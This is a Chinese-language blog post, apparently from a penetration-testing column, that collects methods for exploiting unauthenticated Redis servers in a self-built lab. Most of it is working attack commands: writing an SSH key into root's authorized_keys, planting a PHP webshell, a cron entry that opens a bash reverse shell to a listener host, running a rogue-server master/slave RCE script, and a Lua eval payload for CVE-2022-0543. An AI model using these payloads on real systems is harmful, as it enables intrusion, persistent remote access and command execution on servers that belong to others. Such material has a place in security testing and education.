Redis未授权访问利用合集

最新推荐文章于 2024-04-06 14:54:56 发布
最新推荐文章于 2024-04-06 14:54:56 发布
阅读量832 收藏 3
点赞数
分类专栏: 渗透 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010277543/article/details/125652610
版权

Snipaste_2022-06-07_12-26-50

文章目录

Redis未授权访问利用

微信公众号:小惜渗透,欢迎大佬一起交流进步

正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。

1. 利用ssh公钥登录目标服务器

搭建环境:

#下载源码压缩包
wget http://download.redis.io/releases/redis-3.2.11.tar.gz

#解压
tar zxvf redis-3.2.11.tar.gz

#进入压缩目录
cd redis-3.2.11
#编译
make

#编译成功后进入src目录并将redis-server和redis-cli拷贝到/usr/bin目录下,并将redis.conf复制到/etc/

#紧接着编辑redis.conf
vim /etc/redis.conf

将这行绑定本地127.0.0.1加上注释(还可以改成0.0.0.0)

image-20220704205847335

将保护模式关闭

image-20220704205945696

保存,然后启动redis服务

redis-server /etc/redis.conf

image-20220704210233080

切记别忘了关防火墙

在/root/.ssh目录下面会自动创建两个文件,分别是本地的公钥和私钥

ssh-keygen -t rsa

image-20220704174954952

公钥需要加两个换行

(echo "\n\n";cat /root/.ssh/id_rsa.pub)>test.txt

将公钥写入redis

cat test.txt | /Black/redis/redis-cli -h 192.168.52.251 -x set crack

image-20220704213442875

连接redis

redis-cli -h ip

image-20220704175955014

查询redis备份路径

config get dir

查到路径是root(既然是root目录,其实就表明redis应该是用root权限运行,所以就可以尝试直接写ssh公钥)

image-20220704212458546

紧接着更改redis备份路径为ssh公钥存放目录

config set dir /root/.ssh

设置上传公钥的备份文件名字为authorized_keys

config set dbfilename authorized_keys

保存退出

image-20220704214202225

#通过私钥免密连接
ssh -i id_rsa root@192.168.52.251

image-20220704215301194

2.写入webshell

  • 在服务器上存在web网站时,我们可以通过redis直接写入webshell(前提知道网站绝对路径)
#连接redis
redis-cli -h 192.168.52.251
#设置备份文件路径为网站根目录
config set dir /var/www/html/
#设置备份文件名为shell.php
config set dbfilename shell.php
#随便设置一个键,值为一句话马(我下面测试用的phpinfo)
set shell "<?php phpinfo();?>"
#然后保存
save

这样备份文件就会多了一句话, 当我们访问时会被解析

image-20220705105313487

3. 定时任务反弹shell

先在kali里面监听端口

image-20220705110800962

config set dir /var/spool/cron
config set dbfilename root
set xx  "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.52.128/4444 0>&1\n\n"
save

image-20220705111302628

4. Redis 4.x/5.x 主从复制导致的命令执行

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

正常连接redis,然后将备份目录设置成root目录,会提示权限不足

image-20220705115053625

下载exp脚本:https://github.com/n0b0dyCN/redis-rogue-server

#先编译exp
cd RedisModulesSDK/exp/
make

#利用
python redis-rogue-server.py --rhost 192.168.52.251 --lhost 192.168.52.128 --lport 4444

权限可真低,能用的命令也少

image-20220705124938863

5. CVE-2022-0543:redis沙盒逃逸漏洞

造成redis沙盒逃逸漏洞的原因主要是由于redis lua,redis嵌入了lua编程语言作为其脚本引擎,可通过eval命令使用lua,lua引擎是沙盒化的,不能在运行redis的服务器上执行任意代码。但在Debian以及ubuntu发行版上,由于打包问题,在lua沙箱中遗留了一个对象package,攻击者可以利用这个对象package逃逸redis lua沙盒,在运行redis的服务器上执行任意命令。

影响版本:

  • 2.2 <= redis < 5.0.13
  • 2.2 <= redis < 6.0.15
  • 2.2 <= redis < 6.2.5

利用:

Exp:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("touch /tmp/redistest", "r"); local res = f:read("*a"); f:close(); return res' 0

成功

image-20220705133107065

梦小惜
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis Rogue Server: 创新的Redis安全测试工具
gitblog_00067的博客
04-18 332
Redis Rogue Server: 创新的Redis安全测试工具 项目地址:https://gitcode.com/Dliv3/redis-rogue-server 项目简介 Redis Rogue Server 是一个开源项目,由开发者 Dliv3 创建,旨在帮助系统管理员和安全专家进行红队(Red Team)操作和渗透测试,模拟恶意Redis服务器行为。通过这个工具,你可以测试你的应用...
Redis漏洞总结
2301_77498991的博客
04-10 655
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。但是要保证硬盘文件不被删除,而主从复制则能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis
一文清晰带你认识redis漏洞
逍遥小哥的博客
02-01 1218
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
从Reids漏洞聊到getshell手法,再到计划任务和主从复制原理
milu_Sec的博客
01-07 1034
redis漏洞总结 getshell手法 写文件原理
【渗透测试】redis漏洞利用,资深网络安全面试题
最新发布
m0_60607562的博客
04-06 683
save。
Redis数据库漏洞总结
星落的博客
04-13 1166
Redis简介 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。是非关系型数据库 Redis基本常识 Redis默认开放端口为6379端口,其配置文件位置为 /etc/redis/redis.conf ,Redis默认是不需要账号密码的,因此Redis授权漏洞一直很火。 Redis常用命令 set xl 123 ...
Redis系列漏洞总结
NLost
10-21 6091
授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1832
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis漏洞【总结】授权访问复现与利用
qq_45300786的博客
04-20 1337
【Linux】安装httpd+php 一、安装redis服务 kali:192.168.100.23 靶机(centos):192.168.100.20 靶机(centos)安装redis服务 wget http://download.redis.io/releases/redis-2.8.17.tar.gz (如果下载不下来的话:http://distfiles.macports.org/redis/) 解压安装包:tar xzf redis-2.8.17.tar.gz 进入redis目录:cd r
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 4903
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
redis授权getshell四种方式
BING
04-24 3941
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
01-19
Redis 授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
Linux启动Redis 提示权限不够
yujinlong2002的博客
02-23 1290
chmod -R 740 bin
Redis漏洞利用总结】
weixin_46356409的博客
01-22 1243
redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis默认使用 6379 端口。
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
liuhyusb的博客
08-31 71
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
Redis 4.x5.x 授权访问漏洞Redis基于主从复制的RCE)
黑白的博客
12-06 1823
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2702
Redis授权访问漏洞利用方式总结(含靶场搭建)
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值